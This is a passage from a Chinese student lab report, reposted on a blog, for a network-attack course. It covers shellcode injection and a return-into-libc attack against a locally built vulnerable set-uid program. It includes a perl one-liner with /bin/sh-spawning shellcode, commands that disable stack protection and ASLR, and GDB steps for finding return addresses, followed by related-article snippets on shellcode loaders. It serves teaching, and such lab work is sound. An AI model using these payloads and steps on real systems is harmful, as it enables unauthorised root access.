20145203盖泽双《网络对抗技术》拓展:注入:shellcode及return-into-libc攻击

最新推荐文章于 2022-05-26 19:05:53 发布
最新推荐文章于 2022-05-26 19:05:53 发布
阅读量245 收藏
点赞数
文章标签: 操作系统 shell 开发工具
原文链接:http://www.cnblogs.com/GZSdeboke/p/6529904.html
版权

20145203盖泽双《网络对抗技术》拓展:注入:shellcode及return-into-libc攻击

一、注入:shellcode

1、编写一段用于获取Shellcode的C语言代码
   shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),它被用来发送到服务器利用其特定漏洞获取其权限。 Shellcode是溢出程序和蠕虫病毒的核心,只对没有打补丁的主机有用武之地。在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,Shellcode本质上可以使用任何编程语言,但我们需要的是提取其中的机器码。

890515-20170310125205853-1248764366.png

2、设置实践成功的必备环境

GCC中的编译器有堆栈保护技术(结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了。)所以我们应当采取一些措施确保我们的shellcode可以注入成功。
(1)在虚拟机中下载安装execstack
apt-cache search execstack
apt-get install execstack

890515-20170310125238313-1224141015.png

execstack --help

890515-20170310125312123-1164428981.png

(2)设置堆栈可执行
execstack -s 20145203pwn3

890515-20170310125326623-796905126.png

(3)查询文件的堆栈是否可执行
execstack -q 20145203pwn3

890515-20170310125336686-966170111.png

(4)关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space

890515-20170310125346670-1584725886.png

3、构造要注入的payload
   Linux下有两种基本构造攻击buf的方法:①retaddr+nop+shellcode②nop+shellcode+retaddr。retaddr在缓冲区的位置是固定的,缓冲区小就采用第一种方法,缓冲区大就采用第二种方法。

(1)构造badbuf字符串
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

890515-20170310125652764-781008841.png

注意
①我们的攻击buf结构应为:nops+shellcode+retaddr。
nop作用:一,填充,二,作为“着陆区/滑行区”。我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
②我们一开始不清楚应该将这段shellcode代码注入到哪个地方,所以最后四位的地址暂时用x04\x03\x02\x01\来代替。
③最后一个字符不可以是\x0a。否则\x0a代表回车,程序将直接执行,我们没有办法进行调试。
(2)用我们构造的badbuf字符串来执行20145203pwn3
cat input_shellcode;cat

890515-20170310125421529-560530955.png

4、经过调试确定x04\x03\x02\x01\处到底是什么

(1)重新打开一个窗口,得到正在运行的程序的进程号。
ps -ef | grep 20145203pwn3

890515-20170310125816967-1572013674.png

(2)对其进行GDB调试,并设置断点。
(gdb) disassemble foo

890515-20170310125824061-1781571802.png

(gdb) break *0x080484ae

890515-20170310125839529-1303609252.png

(3)在程序执行窗口按回车键运行程序。

890515-20170310125901029-59523543.png

(4)查看%esp中的地址并推断出我们所注入的shellcode的起始地址。

890515-20170310125911936-2051116425.png

890515-20170310125923389-1558019874.png

5、重新修改shellcode代码,并运行查看结果

(1)修改shellcode代码。

890515-20170310125936279-1719289875.png

(2)运行修改过的可执行文件,得到shellcode成功注入的结果!

890515-20170310125957873-1353790428.png

二、return-into-libc攻击

   为了对抗将shellcode注入到堆栈的的攻击,现在电脑的防御机制采用了非执行堆栈技术,这种技术使得堆栈上的恶意代码不可执行。因此我们又将shellcode攻击不断改进,想出了return-into-libc攻击。
   libc是Linux下的的函数库,return-into-libc攻击顾名思义就是将漏洞程序跳转到它的函数库中,从而不被发现地破坏漏洞程序的正常运行。

1、该实验需要在linux32位的环境下进行,所以进入到此环境中。
linux32
/bin/bash

890515-20170315184704526-777352809.png

2、关闭地址随机化,以确保攻击成功。
sudo sysctl -w kernel.randmize_va_space=0

890515-20170315184713854-89552626.png

3、让 /bin/sh 指向zsh程序,关闭其保护措施,以获得shell中的root权限。
ln -s zsh sh

890515-20170315184730026-1006457632.png

4、将漏洞retlib.c文件保存到/tmp目录下。

   retlib.c 程序作用:漏洞程序,我们通过控制badfile文件来产生root shell。

cd /tmp
vim retlib.c
890515-20170315184811932-1952480560.png

890515-20170315184747120-1549038878.png

5、编译程序,并运用-fno-stack-protector关闭栈保护机制。
gcc -m32 -g -z noexecstack -fno-stack-protector -o retlib retlib.c

890515-20170315184839745-1436325357.png

6、设置SET-UID,设置su以root身份执行。
chmod u+s reylib
890515-20170315184855198-1607635427.png

7、编辑并编译漏洞程序getenvaddr.c。

   getenvaddr.c 程序作用:漏洞程序,用于读取环境变量。

vim getenvaddr.c

gcc -m32 -o getenvaddr getenvadr.c

890515-20170315184920838-157121661.png

890515-20170315184929854-1257202577.png

8、编写攻击程序exploit.c保存到/tmp目录下。

    exploit.c 程序作用:攻击程序,程序代码段中有 BIN_SH、system、exit 的地址,我们通过修改这些地址,利用retlib程序的漏洞来进行攻击。

890515-20170315184954260-74484646.png

9、获取 BIN_SH 地址。
./getenvaddr BIN_SH ./retlib

890515-20170315185006401-205212087.png

10、编译exploit.c程序并进行调试。
gcc -m32 -g -0 exploit exploit.c
gdb -q ./exploit

890515-20170315185036166-102085699.png

11、获取system 和 exit 的地址。
(gdb) p system
(gdb) p exit

890515-20170315185056604-1365928955.png

12、修改 exploit.c 文件中的内存地址。

890515-20170315185110135-1729356801.png

13、.删除刚才调试编译的 exploit 程序和 badfile 文件,重新编译修改后的 exploit.c。
rm exploit
rm badfile

890515-20170315185131135-1327163549.png

14、先运行攻击程序 exploit,再运行漏洞程序 retlib,攻击成功!

890515-20170315185142276-1902955498.png

890515-20170315185210354-1338560416.png

转载于:https://www.cnblogs.com/GZSdeboke/p/6529904.html

dingyan5016
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
return-into-libc 实验(报告)
ATOD
10-22 936
实验说明 return-into-libc 方式(又称 arc injection)的 漏洞利用可以在不注入代码的情况下达到 攻击利用目的 – 使用已经存在代码的地址覆盖返回地址,通常 为一个函数的地址及相应的参数,如 system()、 exec()等 – 当返回时,通过调用 system()、exec()等函数, 执行攻击者指定的系统命令(函数参数中指定) – 利用 return-into-l...
注入 return to libc(返回C函数标准库攻击
mylyylmy的博客
08-01 1604
最近看到的一个弧注入的题目,了解一下原理 首先弧注入就是在不写入任何可执行代码的情况下注入程序,调用原有的库函数,达到攻击的目的,在Linux下使用较多,这次以windows为例 源程序 #include <stdio.h> #include <windows.h> #include <string> #define PASSWORD "1234567"...
Return-into-libc分析
JD san的博客
05-05 962
经典缓冲区溢出: 利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位置,甚至包括控制程序 执行流的关键数据(比如函数调用后的返回地址),从而控制程序的执行过程并实施恶意行为。因此,攻击者通过篡改函数的返回地址以其指向自己纺织的恶意shellcode,这样函数返回时就可以跳转到相应的恶意代码来执行,即将恶意代码注入目标程序,并在以后跳转到此执行此代码。 提出的安全机制: 针对这种先写后执...
Return-into-libc 攻击及其防御
朝歌
09-09 1335
Return-into-libc 攻击及其防御 本文首先分析了 return-into-libc攻击原理,分别介绍了在不同平台进行传统 return-into-libc 攻击的实验过程和结果。然后,本文进一步引入并解释了返回导向编程的攻击方式,这种攻击可以弥补传统 return-into-libc 攻击的不足,使得攻击更灵活、更有效。最后,本文给出了针对这些攻击方法的防御手段
20145236《网络对抗》进阶实验——Return-to-libc攻击
weixin_30745641的博客
03-21 231
20145236《网络对抗》进阶实验——Return-to-libc攻击 基础知识 Return-into-libc攻击方式不具有同时写和执行的行为模式,因为其不需要注入新的恶意代码,取而代之的是重用漏洞程序中已有的函数完成攻击,让漏洞程序跳转到已有的代码序列(比如库函数的代码序列)。攻击者在实施攻击时仍然可以用恶意代码的地址(比如libc库中的system()函数等)来覆盖程序函数调用的返回地...
chiralium:Windows的Shellcode-to-binary生成器
05-08
手性描述只是一个简单的工具,可以使用Golang从shellcode生成二进制文件。 当然,您需要能够“构建”。 您也可以指定自己的shellcode或使用msfvenom即时生成一个抄表器reverse_https(x86或x64)。 为了避免静态...
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
go-shellcode:将Shellcode加载到新进程中
02-06
壳码这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。用法请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或...
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
Return-to-libc攻击实验-内含源码以及设计说明书(可以自己运行复现).zip
最新发布
05-08
网络安全领域,Return-to-libc(Ret2libc攻击是一种经典的栈溢出利用技术,常用于绕过数据执行防止(DEP)机制。本实验旨在通过源码分析和实际操作,帮助学习者理解并掌握这种攻击方式。 **一、Return-to-libc...
20145312 《网络对抗》PC平台逆向破解:注入shellcodeReturn-to-libc 攻击实验
acn19249的博客
03-06 172
20145312 《网络对抗》PC平台逆向破解:注入shellcodeReturn-to-libc 攻击实验 注入shellcode 实验步骤 1. 准备一段Shellcode 2. 设置环境 Bof攻击防御技术 从防止注入的角度来看:在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。 GCC中的编译器有堆栈保护技...
20145334赵文豪《网络对抗shellcode注入&Return-to-libc攻击深入
angying5199的博客
04-01 149
Shellcode注入 shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中,并将堆栈的返回地址利用缓冲区溢出,覆盖成为指向 shellcode 的地址 下载安装execstack 完成环境配置 execstack -s pwn5303:将堆栈设为可执行状态 execstack -q pwn5303:查看文件pwn5302的堆栈是否是可执行状态 用...
[笔记]Windows安全之《三》Shellcode
二次元怪兽的博客
05-26 659
《加密与解密 漏洞篇 14.2 Shellcode》 文章目录前言Shellcode的结构 前言 Shellcode实际上是一段可以独立执行的代码(也可以认为是一段填充数据),在触发了缓冲区溢出漏洞并获取了eip指针的控制权后,通常会将eip指针指向Shellcode以完成漏洞利用过程。 Shellcode主要工作流程: Shellcode的结构 ...............
seedlab:return-to-libc
pang241的专栏
06-20 3122
声明:该教程是根据Seed Lab: return-to-libc的实验要求所写的,该教程只是演示了一下return-to-libc的一些基本的攻击原理,由于关了编译器及系统的一些保护措施,所以并不能在实际的情况下实现攻击(′▽`〃)一:背景介绍DEP数据执行保护溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的
Return-to-libc攻击实验
qq_29687403的博客
07-17 5473
Return-to-libc攻击实验 Return-to-libc攻击是一种特殊的缓冲区溢出攻击,通常用于攻击有“栈不可执行”保护措施的目标系统。本实验中我们将用system()地址替换返回地址,用它调用一个root shell
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 2860
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
一文吃透Linux提权
weixin_45727359的博客
11-07 2435
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
转载内网备忘录
赵一舟的博客
06-01 1265
文章内容没谈snmp利用,可以去乌云等社区获取,没有后续内网持久化,日志处理,bypass uac等内容。Webshell测试主站,搜wooyun历史洞未发现历史洞,github,svn,目录扫描未发现敏感信息,无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用ocr识别,找账号,通过google,baidu,bing等搜索,相关邮箱,域名等加常用密码组成字典,发现...
kali linux怎么编译软件包,如何在Kali Linux下编译Windows Exploit(示例代码)
weixin_30941215的博客
05-02 191
前言微软的Windows在企业或是个人应用领域占据着最大的市场份额,在渗透测试过程中你会经常遇到很多Windows的工作站和服务器。另一方面,大多数渗透测试人员主要使用基于Linux的发行版渗透测试系统,比如Kali Linux或者Pentoo和Backbox。因此你可能就需要有在Linux机器上快速编译WindowsExploit的能力。一款叫做“Mingw-w64”的软件可以解决这个问题。M...
[HACK学习呀] - 2020-02-08 干货 - Shellcode免杀总结<一>1
08-03
综上所述,Shellcode免杀技术是黑客们在进行渗透测试或者实施网络攻击时所必备的技能。为了有效地保护自己的系统免受Shellcode攻击,系统管理员需要了解Shellcode免杀技术的原理和方法,并采取相应的防御措施。希望...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值